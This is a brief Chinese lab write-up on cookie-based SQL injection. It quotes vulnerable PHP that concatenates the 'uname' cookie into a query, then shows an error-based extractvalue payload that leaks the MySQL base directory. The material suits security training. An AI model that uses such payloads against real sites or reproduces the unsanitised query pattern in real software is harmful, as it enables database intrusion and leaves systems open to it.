从源代码中我们可以看到cookie从username中获得值后,当再次刷新时,会从cookie中读取username,然后进行查询。
关键代码
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
die('Issue with your mysql: ' . mysql_error());
修改登录成功后的请求,在Cookie: uname=admin后面加一个',重放该请求
从上图可以看出,报SQL语法错误,说明cookie位置存在SQL注入漏洞。
如下图所示,我们修改cookie为
uname=admin' and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #
可以看到报错了,我们得到了mysql 的路径。
其他的注入方法自行测试呦!
参考:https://www.cnblogs.com/lcamry/p/5763024.html